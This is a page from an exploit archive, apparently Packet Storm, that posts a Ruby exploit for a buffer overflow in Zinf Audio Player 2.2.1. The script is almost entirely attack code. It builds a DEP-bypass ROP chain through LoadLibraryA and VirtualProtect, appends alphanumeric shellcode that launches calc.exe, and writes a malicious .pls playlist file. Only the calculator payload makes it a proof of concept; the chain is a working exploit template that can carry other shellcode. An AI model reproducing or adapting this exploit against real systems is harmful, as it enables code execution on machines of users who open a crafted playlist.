exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Zinf Audio Player 2.2.1 Buffer Overflow

Zinf Audio Player 2.2.1 Buffer Overflow
Posted Aug 3, 2011
Authored by C4SS!0 G0M3S, h1ch4m

Zinf Audio Player version 2.2.1 buffer overflow with DEP bypass exploit that creates a malicious .pls file.

tags | exploit, overflow
SHA-256 | 948faf9bd2a77d69c944a06053b7ecf595b7ddc4b87af7868c70f0cb8f58aa54

Zinf Audio Player 2.2.1 Buffer Overflow

Change Mirror Download
#!/usr/bin/ruby
#
#[+]Exploit Title: Zinf Audio Player v2.2.1 PLS File Buffer Overflow Vulnerability(DEP BYPASS)
#[+]Date: 03\08\2011
#[+]Author: C4SS!0 and h1ch4m
#[+]Found by: Delikon(http://www.exploit-db.com/exploits/559/) or also Metasploit(http://www.exploit-db.com/exploits/16688)
#[+]Software Link: http://sourceforge.net/projects/zinf/files/zinf/2.2.1/zinf-setup-2.2.1.exe/download
#[+]Version: 2.2.1
#[+]Tested on: Windows XP SP3 Brazilian Portuguese(DEP in AlwaysOn)
#[+]CVE: N/A
#
#
#Exploit Based in Corelan Team Tuturial https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/
#LoadLibraryA("msvcr71.dll") + VirtualProtect()
#

sys = `ver`
if sys =~/Windows/
system("cls")
system("color 4f")
else
system("clear")
end
print '''

Zinf Audio Player v2.2.1 PLS File Buffer Overflow Vulnerability(DEP BYPASS)
Created by C4SS!0 and h1ch4m
E-mails:
C4SS!0 : louredo_@hotmail.com
h1ch4m : h1ch4m@hotmail.com
Sites:
C4SS!0 : net-fuzzer.blogspot.com
h1ch4m : net-effects.blogspot.com

'''
sleep(3)
#Endereco para VirtualProtect 0x7C3528DD
#########################################ROP FOR LOAD "msvcr71.dll"#################################
rop = [0x10002a6f].pack('V') # PUSH ESP # POP EDI # POP ESI # POP EBP # MOV EAX,1 # POP EBX # ADD ESP,30 # RETN
rop += "A" * 12
rop += [0x0040556A].pack('V') # ADD ESP,54 # RETN // Funcao de retorno da LoadLibraryA , Depois de executar LoadLibraryA vem para AQUI.!!!
rop += "A" * (80-rop.length)
rop += [0x100014e8].pack('V') # MOV EAX,EDI # POP EDI # POP ESI # RETN
rop += "G" * 8 # JUNK
rop += [0x1205017d].pack('V') # POP EBX # RETN
rop += "\x00\x00\x00\x00"
rop += [0x1203678a].pack('V') # ADD EBX,EAX # NOP # NOP # NOP # NOP # RETN
rop += [0x112054dd].pack('V') # XCHG EAX,EBP # RETN REPLACE
rop += [0x00420044].pack('V') # POP EBP # RETN
rop += [0x0040556A].pack('V') # ADD ESP,54 # RETN // Funcao de retorno da LoadLibraryA , Depois de executar LoadLibraryA vem para AQUI.!!!
rop += [0x10001E11].pack('V') # POP EDI # RETN
rop += [0x7C801D7B].pack('V') # Endereco para LoadLibraryA // Conserta o valor de EDI para o PUSHAD
rop += [0x1200CA76].pack('V') # PUSHAD # RETN
rop += "msvcr71.dll\x00"
rop += "D" * 56
##########################################ROP END HERE####################################

##########################################ROP FOR VirtualProtect###########################
rop += [0x1200edf1].pack('V') # POP EDI # RETN
rop += "JJJJ" # JUNK
rop += [0x7C3528DD].pack('V') # Ponteiro para VirtualProtect
rop += [0x00409E6A].pack('V') # MOV EAX,EBX # POP EBX # RETN 0c
rop += "PPPP"
rop += [0x0042044B].pack('V') * 3 # RETN
rop += [0x0040dc54].pack('V') # PUSH ESI # ADD AL,5E # POP EBP # RETN 04
############################ADICIONANDO A EAX######################################
rop += [0x7C3410C3].pack('V') # POP ECX # RETN
rop += [0x00000200].pack('V') # O valor que sera adicionado a EAX
rop += [0x7C358F2C].pack('V') # ADD EAX,ECX # POP ESI # RETN
rop += "GGGG"
#####################################################################################
rop += [0x0040fd82].pack('V') # XCHG EAX,ECX # POP EBP # RETN
rop += "BBBB"
rop += [0x1201dc80].pack('V') # MOV EAX,ECX # RETN
rop += [0x1060fd8f].pack('V') # XCHG EAX,EBP # RETN
################################MUDA O ENDEREÇO DO PARAMETRO#######################################
rop += [0x1201dc80].pack('V') # MOV EAX,ECX # RETN
rop += [0x12007AD6].pack('V') # POP EBX # RETN
rop += "\x00\x00\x00\x00"
rop += [0x7c3451b9].pack('V') # POP EDX # RETN
rop += "\x00\x00\x00\x00"
rop += [0x1203678a].pack('V') # ADD EBX,EAX # NOP # NOP # NOP # NOP # RETN //Endereço do ultimo paramentro de VirtualProtect
rop += [0x1000333e].pack('V') # ADD EDX,EBX # POP EBX # RETN 10
rop += "QQQQ"
rop += [0x12007AD7].pack('V') * 10 # RETN
###################################################################################################
rop += [0x0040ba55].pack('V') # XCHG EAX,EDX # RETN // Endereco disponivel
rop += [0x12011D0B].pack('V') # XCHG EAX,ECX # CMP EAX,5E5F0002 # RETN
rop += [0x12007AD7].pack('V') # RETN
rop += [0x10001436].pack('V') # MOV EAX,ECX # POP EBX # RETN
rop += "GGGG"
rop += [0x12007AD6].pack('V') # POP EBX # RETN
rop += "\x00\x03\x00\x00"
rop += [0x11601da9].pack('V') # POP EAX # RETN
rop += "\x40\x00\x00\x00"
rop += [0x0040ba55].pack('V') # XCHG EAX,EDX # RETN
rop += [0x12026C85].pack('V') # PUSHAD # RETN
rop += "A" * 156
#########################Ir para o shellcode depois da funçao VirtualProtect###############
rop += [0x10002e13].pack('V') # ADD EAX,ECX # RETN
rop += [0x10610e4d].pack('V') # POP ECX # RETN
rop += [0x0000012b].pack('V') # Valor que sera adicionado a EAX
rop += [0x10002e13].pack('V') # ADD EAX,ECX # RETN
rop += [0x111025F1].pack('V') # CALL EAX and JMP to my Shellcode. :)
##########################################ROP END HERE#####################################
shellcode = "\x44" * (50-0x12)
shellcode +=
"PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIONMRU2SJXH9KHNHYD4FDK"+
"D0XGC9YX1FRP1T0B2TCRPEBK3RJMNZ8GMLV879DONSVQXK7FWLCSIJ5VLO0WXWYWVLDO0O2SZGL62OVO"+
"RP3N3DMMERZJDY3R9N0Q695JE6J3KEUYGM5LNQTR0EK3PUDYY0PN3MY3NQ4KX980PGSPPN3N5L3Q5RI9"+ #Shellcode Alpha Numeric WinExec "Calc.exe"
"GQ3J5M6MO9KMMOQ7OHZT2X2SLLUKOS1L6VDN6QKJWUGTV07YVMHMKQY4N5NG4WLE4QML9QWOOELVEXMQ"+ #Baseaddress EAX.
"2LFNN2UMWFWE2KSPLWK8OSWDJ1O8NOTGPQK1K0KJGZJ5OE8VCNW9T4Q2RUMOZ6NCTL9TSLKJNZKW0NMN"+
"LSQMFWOHKHLLX7ON4SNZQ4NQO4QMVLNMZPVD89ULWKNTQMP0M1S3L6SNXMWBYNPPIT73NOXWKRRVZRN8"+
"WDN0SUK8WOMV4DNNTWPYWN27KA"
buf = "A" * 1300
buf += rop
buf += shellcode

print "\t\t[+]Creating Exploit File...\n"
sleep(1)
begin
File.open("Exploit.pls","wb") do |f|
f.write buf
f.close
print "\t\t[+]File Exploit.pls create successfully.\n"
sleep(1)
end
rescue
print "**[-]Error: #{$!}\n"
exit(0)
end

Login or Register to add favorites

File Archive:

August 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    20 Files
  • 2
    Aug 2nd
    4 Files
  • 3
    Aug 3rd
    6 Files
  • 4
    Aug 4th
    55 Files
  • 5
    Aug 5th
    16 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    13 Files
  • 9
    Aug 9th
    13 Files
  • 10
    Aug 10th
    34 Files
  • 11
    Aug 11th
    16 Files
  • 12
    Aug 12th
    5 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    25 Files
  • 16
    Aug 16th
    3 Files
  • 17
    Aug 17th
    6 Files
  • 18
    Aug 18th
    4 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close